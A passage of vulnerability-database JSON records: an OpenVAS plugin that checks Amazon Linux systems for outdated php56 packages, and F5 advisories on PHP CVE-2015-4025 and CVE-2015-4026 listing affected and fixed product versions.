"2016-11-15T00:00:00", "naslFamily": "Amazon Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310120222", "published": "2015-09-08T00:00:00", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 4513 2016-11-15 09:37:48Z cfi $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 4513 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2016-11-15 10:37:48 +0100 (Tue, 15 Nov 2016) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"HostDetails/OS/cpe:/o:amazon:linux\", \"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_summary(\"Amazon Linux Local Security Checks alas-2015-536\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "title": "Amazon Linux Local Check: alas-2015-536", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:12:30"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "051d3fa80639370fd8e85d743d26684b"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "href", "hash": "c987a25a392ca9438af43d057067b21a"}, {"key": "modified", "hash": "b50cff288596b473f692a61acc91c1d2"}, {"key": "naslFamily", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "pluginID", "hash": "15a1c50a40bcb97a18bd75742b61fd60"}, {"key": "published", "hash": "166e43b7efd51fc461aa157ed9ed169d"}, {"key": "references", "hash": "260dd5f8477dc74ecc091d01197c5f94"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}, {"key": "sourceData", "hash": "6117b0f420567306253941230a305c3a"}, {"key": "title", "hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "ad3079c0b2563ec4fa6606df4ac0518192aef538ac49a64fa7d5c9c8fe504475", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-536\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-536.html\");\n script_cve_id(\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4024\", \"CVE-2015-4026\", \"CVE-2015-2325\", \"CVE-2015-2326\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Amazon Linux Local Security Checks", "pluginID": "1361412562310120222"}
{"f5": [{"lastseen": "2017-06-08T00:16:40", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned IDs 532561 and 532562 (BIG-IP), ID 528817 (BIG-IQ), and ID 525232 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP AAM| 11.6.0 \n11.4.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP AFM| 11.6.0 \n11.3.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP Analytics| 11.6.0 \n11.0.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP APM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP ASM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP GTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP Link Controller| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP PEM| 11.6.0 \n11.3.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| PHP framework, Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP framework, Control Plane \nLineRate| None| 2.2.0 - 2.6.1 \n1.6.0 - 1.6.4| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "reporter": "f5", "published": "2015-07-22T23:35:00", "title": "PHP vulnerabilities CVE-2015-4025 and CVE-2015-4026", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4026"], "modified": "2016-05-27T18:19:00", "href": "https://support.f5.com/csp/article/K16993", "id": "F5:K16993", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-27T21:23:48", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n", "reporter": "f5", "published": "2015-07-22T00:00:00", "title": "SOL16993 - PHP vulnerabilities CVE-2015-4025 and CVE-2015-4026", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.5.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IQ ADC", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.3", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.6.0", "operator": "le"}], "cvelist": ["CVE-2006-7243", 